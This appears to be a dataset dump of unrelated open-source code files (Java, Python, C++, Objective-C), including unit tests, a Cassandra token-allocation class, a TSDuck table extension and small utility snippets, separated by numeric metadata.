static String regStrSig = "<[a-z]{1}>|</[a-z]{1}>";
public static void main(String[] args){
Pattern pattern = Pattern.compile(regStr);
String str = "总<b>公司</b>的<b>本</b>25名,分(子)<b>公司</b>s<b>本bu</b>86名<b>hello</b>你好<b>sa</b>";
Matcher match = pattern.matcher(str);
// 保存匹配到的字符串去除标签后的内容
List<String> list = new ArrayList<>();
boolean headFlag = false;
while( match.find() ){
System.out.println("==================");
if( !headFlag && match.start() == 0){
// 说明首位就匹配到了
headFlag = true;
}
String string = match.group();
System.out.println("匹配项输出:" + string);
StringBuffer stringBuffer = new StringBuffer();
for(String ele : Pattern.compile(regStrSig).split(string)){
stringBuffer.append(ele);
}
System.out.println("匹配项去除标签:" + stringBuffer.toString());
list.add(stringBuffer.toString());
}
System.out.println("=============");
for (String ele : list){
System.out.println("需要插入的内容:" + ele);
}
System.out.println("=============");
// 匹配后剩下的
String[] matchArr = pattern.split(str);
for(String ele : matchArr){
System.out.println(ele);
}
List<String> result = new ArrayList<>();
if(headFlag){
// 第一个字符就匹配到了
for( int i = 0; i < list.size() ; i++ ){
result.add(list.get(i));
result.add(matchArr[i]);
}
}else{
// 不是第一个字符匹配到的
for( int i = 0; i < list.size() ; i++ ){
result.add(matchArr[i]);
result.add(list.get(i));
}
}
System.out.println("+++++++++++++++++++++++++");
System.out.println(result);
StringBuffer sb = new StringBuffer();
for(String ele : result){
sb.append(ele);
}
System.out.println("----------------------------------------------------------");
System.out.println("原始:" + str);
System.out.println("结果:" + sb.toString());
System.out.println("----------------------------------------------------------");
}
}
| 1,528 |
12,869 | """Identity operators
@see: https://www.w3schools.com/python/python_operators.asp
Identity operators are used to compare the objects, not if they are equal, but if they are actually
the same object, with the same memory location.
"""
def test_identity_operators():
"""Identity operators"""
# Let's illustrate identity operators based on the following lists.
first_fruits_list = ["apple", "banana"]
second_fruits_list = ["apple", "banana"]
third_fruits_list = first_fruits_list
# is
# Returns true if both variables are the same object.
# Example:
# first_fruits_list and third_fruits_list are the same objects.
assert first_fruits_list is third_fruits_list
# is not
# Returns true if both variables are not the same object.
# Example:
# first_fruits_list and second_fruits_list are not the same objects, even if they have
# the same content
assert first_fruits_list is not second_fruits_list
# To demonstrate the difference between "is" and "==": this comparison returns True because
# first_fruits_list is equal to second_fruits_list.
assert first_fruits_list == second_fruits_list
| 369 |
345 | <filename>Note-6 A3CNet/Note-6.4 HS300指数增强/train.py
import multiprocessing
import threading
import tensorflow as tf
from agent.main import Access, Framework
# NUMS_CPU = multiprocessing.cpu_count()
NUMS_CPU = 1
inputs_shape = [381, 240, 58]
action_size = 3
max_episodes = 1
GD = {}
class Worker(Framework):
def __init__(self, name, access, inputs_shape, action_size):
super().__init__(name, access, inputs_shape, action_size)
def run(self, sess, max_episodes, t_max=8):
episode_score_list = []
episode = 0
while episode < max_episodes:
episode += 1
episode_socre, _ = self.run_episode(sess, t_max)
episode_score_list.append(episode_socre)
GD[str(self.name)] = episode_score_list
if self.name == 'W0':
print('Episode: %f, score: %f' % (episode, episode_socre))
print('\n')
with tf.Session() as sess:
with tf.device("/cpu:0"):
A = Access(inputs_shape, action_size)
F_list = []
for i in range(NUMS_CPU):
F_list.append(Worker('W%i' % i, A, inputs_shape, action_size))
COORD = tf.train.Coordinator()
sess.run(tf.global_variables_initializer())
sess.graph.finalize()
threads_list = []
for ac in F_list:
job = lambda: ac.run(sess, max_episodes)
t = threading.Thread(target=job)
t.start()
threads_list.append(t)
COORD.join(threads_list)
A.save(sess, 'model/saver_1.ckpt') | 748 |
1,806 | <filename>apollo-api-impl/src/test/java/com/spotify/apollo/request/RequestHandlerImplTest.java
/*
* -\-\-
* Spotify Apollo API Implementations
* --
* Copyright (C) 2013 - 2015 Spotify AB
* --
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* -/-/-
*/
package com.spotify.apollo.request;
import com.spotify.apollo.Request;
import com.spotify.apollo.RequestContext;
import com.spotify.apollo.RequestMetadata;
import com.spotify.apollo.Response;
import com.spotify.apollo.dispatch.Endpoint;
import com.spotify.apollo.dispatch.EndpointInfo;
import com.spotify.apollo.environment.IncomingRequestAwareClient;
import com.spotify.apollo.route.Rule;
import com.spotify.apollo.route.RuleMatch;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.mockito.ArgumentCaptor;
import org.mockito.Captor;
import org.mockito.Mock;
import org.mockito.junit.MockitoJUnitRunner;
import java.time.Instant;
import java.util.Optional;
import java.util.concurrent.CompletionStage;
import java.util.function.BiConsumer;
import okio.ByteString;
import static com.spotify.apollo.Response.forStatus;
import static com.spotify.apollo.Status.INTERNAL_SERVER_ERROR;
import static org.hamcrest.Matchers.is;
import static org.junit.Assert.assertThat;
import static org.mockito.Matchers.any;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.doThrow;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
@RunWith(MockitoJUnitRunner.class)
public class RequestHandlerImplTest {
@Mock RequestRunnableFactory requestFactory;
@Mock EndpointRunnableFactory endpointFactory;
@Mock RequestRunnable requestRunnable;
@Mock Runnable runnable;
@Mock OngoingRequest ongoingRequest;
@Mock RuleMatch<Endpoint> match;
@Mock Endpoint endpoint;
@Mock EndpointInfo info;
@Captor ArgumentCaptor<BiConsumer<OngoingRequest, RuleMatch<Endpoint>>> continuationCaptor;
@Captor ArgumentCaptor<RequestContext> requestContextCaptor;
RequestHandlerImpl requestHandler;
private RequestMetadata requestMetadata;
@Before
public void setUp() throws Exception {
IncomingRequestAwareClient client = new NoopClient();
requestMetadata = RequestMetadataImpl.create(Instant.ofEpochSecond(4711L), Optional.empty(), Optional.empty());
when(ongoingRequest.metadata()).thenReturn(requestMetadata);
when(ongoingRequest.request()).thenReturn(Request.forUri("http://foo"));
when(requestFactory.create(any())).thenReturn(requestRunnable);
when(endpointFactory.create(eq(ongoingRequest), requestContextCaptor.capture(), eq(endpoint)))
.thenReturn(runnable);
when(match.getRule()).thenReturn(Rule.fromUri("http://foo", "GET", endpoint));
requestHandler = new RequestHandlerImpl(requestFactory, endpointFactory, client);
}
@Test
public void shouldRunRequestRunnable() throws Exception {
requestHandler.handle(ongoingRequest);
verify(requestRunnable).run(any());
}
@Test
public void shouldRunEndpointRunnable() throws Exception {
requestHandler.handle(ongoingRequest);
verify(requestRunnable).run(continuationCaptor.capture());
continuationCaptor.getValue()
.accept(ongoingRequest, match);
verify(endpointFactory).create(eq(ongoingRequest), any(RequestContext.class), eq(endpoint));
verify(runnable).run();
}
@Test
public void shouldReplySafelyForExceptions() throws Exception {
doThrow(new NullPointerException("expected")).when(requestRunnable).run(any());
requestHandler.handle(ongoingRequest);
verify(ongoingRequest).reply(forStatus(INTERNAL_SERVER_ERROR));
}
@Test
public void shouldSetRequestContextMetadata() throws Exception {
requestHandler.handle(ongoingRequest);
verify(requestRunnable).run(continuationCaptor.capture());
continuationCaptor.getValue()
.accept(ongoingRequest, match);
final RequestContext requestContext = requestContextCaptor.getValue();
assertThat(requestContext.metadata(), is(requestMetadata));
}
private static class NoopClient implements IncomingRequestAwareClient {
@Override
public CompletionStage<Response<ByteString>> send(Request request, Optional<Request> incoming) {
throw new UnsupportedOperationException();
}
}
}
| 1,501 |
542 | // Sample TSDuck extension.
// Definition of the Foo Table (FOOT)
#include "fooTable.h"
// Characteristics of a FOOT
#define MY_XML_NAME u"FOOT" // XML name is <FOOT>
#define MY_CLASS foo::FooTable // Fully qualified class name
#define MY_TID foo::TID_FOOT // Table id
#define MY_STD foo::STD // DTV standards for FOOT.
// Registration of the table in TSDuck library
TS_REGISTER_TABLE(MY_CLASS, {MY_TID}, MY_STD, MY_XML_NAME, MY_CLASS::DisplaySection);
//----------------------------------------------------------------------------
// Constructors
//----------------------------------------------------------------------------
foo::FooTable::FooTable(uint16_t id_, const ts::UString name_, uint8_t version_, bool is_current_) :
AbstractLongTable(MY_TID, MY_XML_NAME, MY_STD, version_, is_current_),
foo_id(id_),
name(name_),
descs(this)
{
}
foo::FooTable::FooTable(const FooTable& other) :
AbstractLongTable(other),
foo_id(other.foo_id),
name(other.name),
descs(this, other.descs)
{
}
foo::FooTable::FooTable(ts::DuckContext& duck, const ts::BinaryTable& table) :
FooTable()
{
deserialize(duck, table);
}
//----------------------------------------------------------------------------
// Get the table id extension
//----------------------------------------------------------------------------
uint16_t foo::FooTable::tableIdExtension() const
{
// This is the field which is serialize as "table id extension" in a FOOT.
return foo_id;
}
//----------------------------------------------------------------------------
// Clear content, return to initial values
//----------------------------------------------------------------------------
void foo::FooTable::clearContent()
{
foo_id = 0;
name.clear();
descs.clear();
}
//----------------------------------------------------------------------------
// Deserialization of the payload of one section.
// The content is added to the table.
// Buffer deserialization errors or remaining data invalidate the table.
//----------------------------------------------------------------------------
void foo::FooTable::deserializePayload(ts::PSIBuffer& buf, const ts::Section& section)
{
// Get fixed part. Should be identical in all sections.
foo_id = section.tableIdExtension();
// Get name (accumulated from all sections)
name.append(buf.getStringWithByteLength());
// Add descriptors from the section.
buf.getDescriptorListWithLength(descs);
}
//----------------------------------------------------------------------------
// Serialization
//----------------------------------------------------------------------------
void foo::FooTable::serializePayload(ts::BinaryTable& table, ts::PSIBuffer& buf) const
{
size_t name_index = 0;
size_t desc_index = 0;
// Build sections until name and descriptors are all gone.
// Make sure to build at least one section.
do {
// Serialize as many characters as possible from the name.
name_index += buf.putPartialStringWithByteLength(name, name_index);
// Serialize as many descriptors as possible.
desc_index = buf.putPartialDescriptorListWithLength(descs, desc_index);
// Add this section. The payload buffer is reset on return.
addOneSection(table, buf);
} while (name_index < name.size() || desc_index < descs.size());
}
//----------------------------------------------------------------------------
// A static method to display an FOOT section.
//----------------------------------------------------------------------------
void foo::FooTable::DisplaySection(ts::TablesDisplay& disp, const ts::Section& section, ts::PSIBuffer& buf, const ts::UString& margin)
{
const uint16_t id = section.tableIdExtension();
const ts::UString name(buf.getStringWithByteLength());
disp << margin << ts::UString::Format(u"Foo id: 0x%X (%<d), name: \"%s\"", {id, name}) << std::endl;
disp.displayDescriptorListWithLength(section, buf, margin);
disp.displayExtraData(buf, margin);
}
//----------------------------------------------------------------------------
// XML serialization
//----------------------------------------------------------------------------
void foo::FooTable::buildXML(ts::DuckContext& duck, ts::xml::Element* root) const
{
root->setIntAttribute(u"version", version);
root->setBoolAttribute(u"current", is_current);
root->setIntAttribute(u"foo_id", foo_id, true);
root->setAttribute(u"name", name, true);
descs.toXML(duck, root);
}
//----------------------------------------------------------------------------
// XML deserialization
//----------------------------------------------------------------------------
bool foo::FooTable::analyzeXML(ts::DuckContext& duck, const ts::xml::Element* element)
{
return element->getIntAttribute<uint8_t>(version, u"version", false, 0, 0, 31) &&
element->getBoolAttribute(is_current, u"current", false, true) &&
element->getIntAttribute<uint16_t>(foo_id, u"foo_id", true) &&
element->getAttribute(name, u"name") &&
descs.fromXML(duck, element);
}
| 1,511 |
9,541 | <reponame>mkleshchenok/simdjson
#pragma once
#include "runner_base.h"
#include "simdjson.h"
namespace json_benchmark {
template<typename I>
struct string_runner : public runner_base<I> {
const simdjson::padded_string &original_json;
simdjson::padded_string json;
string_runner(const simdjson::padded_string &_json) : original_json{_json}, json(original_json.data(), original_json.size()) {}
simdjson_warn_unused bool before_run(benchmark::State &state) {
if (!runner_base<I>::after_run(state)) { return false; };
// Copy the original json in case we did *in situ*
std::memcpy(json.data(), original_json.data(), original_json.size());
return true;
}
/** Get the total number of bytes processed in each iteration. Used for metrics like bytes/second. */
size_t bytes_per_iteration() {
return json.size();
}
/** Get the total number of documents processed in each iteration. Used for metrics like documents/second. */
size_t documents_per_iteration() {
return 1;
}
/** Get the total number of items processed in each iteration. Used for metrics like items/second. */
size_t items_per_iteration() {
return 1;
}
};
} // namespace json_benchmark | 393 |
13,057 | <filename>src/test/java/org/mockito/InvocationFactoryTest.java<gh_stars>1000+
/*
* Copyright (c) 2018 Mockito contributors
* This program is made available under the terms of the MIT License.
*/
package org.mockito;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.fail;
import static org.mockito.Mockito.spy;
import static org.mockito.Mockito.withSettings;
import org.junit.Test;
import org.mockito.invocation.Invocation;
import org.mockito.invocation.InvocationFactory;
import org.mockitoutil.TestBase;
public class InvocationFactoryTest extends TestBase {
static class TestClass {
public String testMethod() throws Throwable {
return "un-mocked";
}
}
final TestClass mock = spy(TestClass.class);
@Test
public void call_method_that_throws_a_throwable() throws Throwable {
Invocation invocation =
Mockito.framework()
.getInvocationFactory()
.createInvocation(
mock,
withSettings().build(TestClass.class),
TestClass.class.getDeclaredMethod("testMethod"),
new InvocationFactory.RealMethodBehavior() {
@Override
public Object call() throws Throwable {
throw new Throwable("mocked");
}
});
try {
Mockito.mockingDetails(mock).getMockHandler().handle(invocation);
} catch (Throwable t) {
assertEquals("mocked", t.getMessage());
return;
}
fail();
}
@Test
public void call_method_that_returns_a_string() throws Throwable {
Invocation invocation =
Mockito.framework()
.getInvocationFactory()
.createInvocation(
mock,
withSettings().build(TestClass.class),
TestClass.class.getDeclaredMethod("testMethod"),
new InvocationFactory.RealMethodBehavior() {
@Override
public Object call() throws Throwable {
return "mocked";
}
});
Object ret = Mockito.mockingDetails(mock).getMockHandler().handle(invocation);
assertEquals("mocked", ret);
}
}
| 1,409 |
6,210 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.cassandra.dht.tokenallocator;
import java.util.Collection;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.NavigableMap;
import java.util.TreeMap;
import com.google.common.collect.Lists;
import com.google.common.collect.Maps;
import org.apache.commons.math3.stat.descriptive.SummaryStatistics;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.cassandra.config.DatabaseDescriptor;
import org.apache.cassandra.dht.Token;
import org.apache.cassandra.exceptions.ConfigurationException;
import org.apache.cassandra.locator.AbstractReplicationStrategy;
import org.apache.cassandra.locator.IEndpointSnitch;
import org.apache.cassandra.locator.InetAddressAndPort;
import org.apache.cassandra.locator.NetworkTopologyStrategy;
import org.apache.cassandra.locator.SimpleStrategy;
import org.apache.cassandra.locator.TokenMetadata;
import org.apache.cassandra.locator.TokenMetadata.Topology;
public class TokenAllocation
{
public static final double WARN_STDEV_GROWTH = 0.05;
private static final Logger logger = LoggerFactory.getLogger(TokenAllocation.class);
final TokenMetadata tokenMetadata;
final AbstractReplicationStrategy replicationStrategy;
final int numTokens;
final Map<String, Map<String, StrategyAdapter>> strategyByRackDc = new HashMap<>();
private TokenAllocation(TokenMetadata tokenMetadata, AbstractReplicationStrategy replicationStrategy, int numTokens)
{
this.tokenMetadata = tokenMetadata.cloneOnlyTokenMap();
this.replicationStrategy = replicationStrategy;
this.numTokens = numTokens;
}
public static Collection<Token> allocateTokens(final TokenMetadata tokenMetadata,
final AbstractReplicationStrategy rs,
final InetAddressAndPort endpoint,
int numTokens)
{
return create(tokenMetadata, rs, numTokens).allocate(endpoint);
}
public static Collection<Token> allocateTokens(final TokenMetadata tokenMetadata,
final int replicas,
final InetAddressAndPort endpoint,
int numTokens)
{
return create(DatabaseDescriptor.getEndpointSnitch(), tokenMetadata, replicas, numTokens).allocate(endpoint);
}
static TokenAllocation create(IEndpointSnitch snitch, TokenMetadata tokenMetadata, int replicas, int numTokens)
{
// We create a fake NTS replication strategy with the specified RF in the local DC
HashMap<String, String> options = new HashMap<>();
options.put(snitch.getLocalDatacenter(), Integer.toString(replicas));
NetworkTopologyStrategy fakeReplicationStrategy = new NetworkTopologyStrategy(null, tokenMetadata, snitch, options);
TokenAllocation allocator = new TokenAllocation(tokenMetadata, fakeReplicationStrategy, numTokens);
return allocator;
}
static TokenAllocation create(TokenMetadata tokenMetadata, AbstractReplicationStrategy rs, int numTokens)
{
return new TokenAllocation(tokenMetadata, rs, numTokens);
}
Collection<Token> allocate(InetAddressAndPort endpoint)
{
StrategyAdapter strategy = getOrCreateStrategy(endpoint);
Collection<Token> tokens = strategy.createAllocator().addUnit(endpoint, numTokens);
tokens = strategy.adjustForCrossDatacenterClashes(tokens);
SummaryStatistics os = strategy.replicatedOwnershipStats();
tokenMetadata.updateNormalTokens(tokens, endpoint);
SummaryStatistics ns = strategy.replicatedOwnershipStats();
logger.info("Selected tokens {}", tokens);
logger.debug("Replicated node load in datacenter before allocation {}", statToString(os));
logger.debug("Replicated node load in datacenter after allocation {}", statToString(ns));
double stdDevGrowth = ns.getStandardDeviation() - os.getStandardDeviation();
if (stdDevGrowth > TokenAllocation.WARN_STDEV_GROWTH)
{
logger.warn(String.format("Growth of %.2f%% in token ownership standard deviation after allocation above warning threshold of %d%%",
stdDevGrowth * 100, (int)(TokenAllocation.WARN_STDEV_GROWTH * 100)));
}
return tokens;
}
static String statToString(SummaryStatistics stat)
{
return String.format("max %.2f min %.2f stddev %.4f", stat.getMax() / stat.getMean(), stat.getMin() / stat.getMean(), stat.getStandardDeviation());
}
SummaryStatistics getAllocationRingOwnership(String datacenter, String rack)
{
return getOrCreateStrategy(datacenter, rack).replicatedOwnershipStats();
}
SummaryStatistics getAllocationRingOwnership(InetAddressAndPort endpoint)
{
return getOrCreateStrategy(endpoint).replicatedOwnershipStats();
}
abstract class StrategyAdapter implements ReplicationStrategy<InetAddressAndPort>
{
// return true iff the provided endpoint occurs in the same virtual token-ring we are allocating for
// i.e. the set of the nodes that share ownership with the node we are allocating
// alternatively: return false if the endpoint's ownership is independent of the node we are allocating tokens for
abstract boolean inAllocationRing(InetAddressAndPort other);
final TokenAllocator<InetAddressAndPort> createAllocator()
{
NavigableMap<Token, InetAddressAndPort> sortedTokens = new TreeMap<>();
for (Map.Entry<Token, InetAddressAndPort> en : tokenMetadata.getNormalAndBootstrappingTokenToEndpointMap().entrySet())
{
if (inAllocationRing(en.getValue()))
sortedTokens.put(en.getKey(), en.getValue());
}
return TokenAllocatorFactory.createTokenAllocator(sortedTokens, this, tokenMetadata.partitioner);
}
final Collection<Token> adjustForCrossDatacenterClashes(Collection<Token> tokens)
{
List<Token> filtered = Lists.newArrayListWithCapacity(tokens.size());
for (Token t : tokens)
{
while (tokenMetadata.getEndpoint(t) != null)
{
InetAddressAndPort other = tokenMetadata.getEndpoint(t);
if (inAllocationRing(other))
throw new ConfigurationException(String.format("Allocated token %s already assigned to node %s. Is another node also allocating tokens?", t, other));
t = t.increaseSlightly();
}
filtered.add(t);
}
return filtered;
}
final SummaryStatistics replicatedOwnershipStats()
{
SummaryStatistics stat = new SummaryStatistics();
for (Map.Entry<InetAddressAndPort, Double> en : evaluateReplicatedOwnership().entrySet())
{
// Filter only in the same allocation ring
if (inAllocationRing(en.getKey()))
stat.addValue(en.getValue() / tokenMetadata.getTokens(en.getKey()).size());
}
return stat;
}
// return the ratio of ownership for each endpoint
private Map<InetAddressAndPort, Double> evaluateReplicatedOwnership()
{
Map<InetAddressAndPort, Double> ownership = Maps.newHashMap();
List<Token> sortedTokens = tokenMetadata.sortedTokens();
if (sortedTokens.isEmpty())
return ownership;
Iterator<Token> it = sortedTokens.iterator();
Token current = it.next();
while (it.hasNext())
{
Token next = it.next();
addOwnership(current, next, ownership);
current = next;
}
addOwnership(current, sortedTokens.get(0), ownership);
return ownership;
}
private void addOwnership(Token current, Token next, Map<InetAddressAndPort, Double> ownership)
{
double size = current.size(next);
Token representative = current.getPartitioner().midpoint(current, next);
for (InetAddressAndPort n : replicationStrategy.calculateNaturalReplicas(representative, tokenMetadata).endpoints())
{
Double v = ownership.get(n);
ownership.put(n, v != null ? v + size : size);
}
}
}
private StrategyAdapter getOrCreateStrategy(InetAddressAndPort endpoint)
{
String dc = replicationStrategy.snitch.getDatacenter(endpoint);
String rack = replicationStrategy.snitch.getRack(endpoint);
return getOrCreateStrategy(dc, rack);
}
private StrategyAdapter getOrCreateStrategy(String dc, String rack)
{
return strategyByRackDc.computeIfAbsent(dc, k -> new HashMap<>()).computeIfAbsent(rack, k -> createStrategy(dc, rack));
}
private StrategyAdapter createStrategy(String dc, String rack)
{
if (replicationStrategy instanceof NetworkTopologyStrategy)
return createStrategy(tokenMetadata, (NetworkTopologyStrategy) replicationStrategy, dc, rack);
if (replicationStrategy instanceof SimpleStrategy)
return createStrategy((SimpleStrategy) replicationStrategy);
throw new ConfigurationException("Token allocation does not support replication strategy " + replicationStrategy.getClass().getSimpleName());
}
private StrategyAdapter createStrategy(final SimpleStrategy rs)
{
return createStrategy(rs.snitch, null, null, rs.getReplicationFactor().allReplicas, false);
}
private StrategyAdapter createStrategy(TokenMetadata tokenMetadata, NetworkTopologyStrategy strategy, String dc, String rack)
{
int replicas = strategy.getReplicationFactor(dc).allReplicas;
Topology topology = tokenMetadata.getTopology();
// if topology hasn't been setup yet for this dc+rack then treat it as a separate unit
int racks = topology.getDatacenterRacks().get(dc) != null && topology.getDatacenterRacks().get(dc).containsKey(rack)
? topology.getDatacenterRacks().get(dc).asMap().size()
: 1;
if (replicas <= 1)
{
// each node is treated as separate and replicates once
return createStrategy(strategy.snitch, dc, null, 1, false);
}
else if (racks == replicas)
{
// each node is treated as separate and replicates once, with separate allocation rings for each rack
return createStrategy(strategy.snitch, dc, rack, 1, false);
}
else if (racks > replicas)
{
// group by rack
return createStrategy(strategy.snitch, dc, null, replicas, true);
}
else if (racks == 1)
{
return createStrategy(strategy.snitch, dc, null, replicas, false);
}
throw new ConfigurationException(String.format("Token allocation failed: the number of racks %d in datacenter %s is lower than its replication factor %d.",
racks, dc, replicas));
}
// a null dc will always return true for inAllocationRing(..)
// a null rack will return true for inAllocationRing(..) for all nodes in the same dc
private StrategyAdapter createStrategy(IEndpointSnitch snitch, String dc, String rack, int replicas, boolean groupByRack)
{
return new StrategyAdapter()
{
@Override
public int replicas()
{
return replicas;
}
@Override
public Object getGroup(InetAddressAndPort unit)
{
return groupByRack ? snitch.getRack(unit) : unit;
}
@Override
public boolean inAllocationRing(InetAddressAndPort other)
{
return (dc == null || dc.equals(snitch.getDatacenter(other))) && (rack == null || rack.equals(snitch.getRack(other)));
}
};
}
}
| 5,173 |
340 | <gh_stars>100-1000
if __name__ == "__main__":
T = int(input().strip())
correct = 1 << 32
for _ in range(T):
num = int(input().strip())
print(~num + correct)
| 83 |
1,362 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class PlaybackGrantTestCase(IntegrationTestCase):
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.media.v1.player_streamer("VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.playback_grant().create()
self.holodeck.assert_has_request(Request(
'post',
'https://media.twilio.com/v1/PlayerStreamers/VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/PlaybackGrant',
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "VJcafebabecafebabecafebabecafebabe",
"url": "https://media.twilio.com/v1/PlayerStreamers/VJcafebabecafebabecafebabecafebabe/PlaybackGrant",
"account_sid": "AC<KEY>",
"date_created": "2015-07-30T20:00:00Z",
"grant": {
"playbackUrl": "http://video.net/123/blabla?token=123",
"playerStreamerSid": "VJcafebabecafebabecafebabecafebabe",
"requestCredentials": null
}
}
'''
))
actual = self.client.media.v1.player_streamer("VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.playback_grant().create()
self.assertIsNotNone(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.media.v1.player_streamer("VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.playback_grant().fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://media.twilio.com/v1/PlayerStreamers/VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/PlaybackGrant',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "<KEY>",
"date_created": "2015-07-30T20:00:00Z",
"url": "https://media.twilio.com/v1/PlayerStreamers/VJcafebabecafebabecafebabecafebabe/PlaybackGrant",
"sid": "VJcafebabecafebabecafebabecafebabe",
"grant": {
"playbackUrl": "http://video.net/123/blabla?token=<PASSWORD>",
"playerStreamerSid": "VJcafebabecafebabecafebabecafebabe",
"requestCredentials": null
}
}
'''
))
actual = self.client.media.v1.player_streamer("VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.playback_grant().fetch()
self.assertIsNotNone(actual)
| 1,628 |
2,586 | <reponame>hackers-painters/samurai
//
// ViewController.h
// test
//
// Created by god on 15/4/29.
// Copyright (c) 2015年 Geek-Zoo Studio. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "Samurai.h"
@interface TestSuiteViewController : UIViewController
@property (nonatomic, strong) NSString * testSuite;
@end
| 121 |
1,383 | // =============================================================================
// PROJECT CHRONO - http://projectchrono.org
//
// Copyright (c) 2014 projectchrono.org
// All rights reserved.
//
// Use of this source code is governed by a BSD-style license that can be found
// in the LICENSE file at the top level of the distribution and at
// http://projectchrono.org/license-chrono.txt.
//
// =============================================================================
#ifndef CHFUNCT_H
#define CHFUNCT_H
#include "chrono/motion_functions/ChFunction_Const.h"
#include "chrono/motion_functions/ChFunction_ConstAcc.h"
#include "chrono/motion_functions/ChFunction_Derive.h"
#include "chrono/motion_functions/ChFunction_Fillet3.h"
#include "chrono/motion_functions/ChFunction_Integrate.h"
#include "chrono/motion_functions/ChFunction_Matlab.h"
#include "chrono/motion_functions/ChFunction_Mirror.h"
#include "chrono/motion_functions/ChFunction_Mocap.h"
#include "chrono/motion_functions/ChFunction_Noise.h"
#include "chrono/motion_functions/ChFunction_Operation.h"
#include "chrono/motion_functions/ChFunction_Oscilloscope.h"
#include "chrono/motion_functions/ChFunction_Poly345.h"
#include "chrono/motion_functions/ChFunction_Poly.h"
#include "chrono/motion_functions/ChFunction_Ramp.h"
#include "chrono/motion_functions/ChFunction_Recorder.h"
#include "chrono/motion_functions/ChFunction_Repeat.h"
#include "chrono/motion_functions/ChFunction_Sequence.h"
#include "chrono/motion_functions/ChFunction_Sigma.h"
#include "chrono/motion_functions/ChFunction_Sine.h"
#include "chrono/motion_functions/ChFunction_Setpoint.h"
#endif
| 523 |
1,244 | //===----------------------------------------------------------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is dual licensed under the MIT and the University of Illinois Open
// Source Licenses. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
// test <cstdarg>
#include <cstdarg>
#ifndef va_arg
#error va_arg not defined
#endif
#ifndef va_copy
#error va_copy not defined
#endif
#ifndef va_end
#error va_end not defined
#endif
#ifndef va_start
#error va_start not defined
#endif
int main()
{
std::va_list va;
}
| 197 |
389 | <gh_stars>100-1000
//
// UIViewController+QSKit.h
// Q Branch Standard Kit
//
// Created by <NAME> on 10/21/13.
// Copyright (c) 2013 Q Branch LLC. All rights reserved.
//
@import UIKit;
@interface UIViewController (QSKit)
- (BOOL)qs_hasChildViewController;
@end
| 104 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.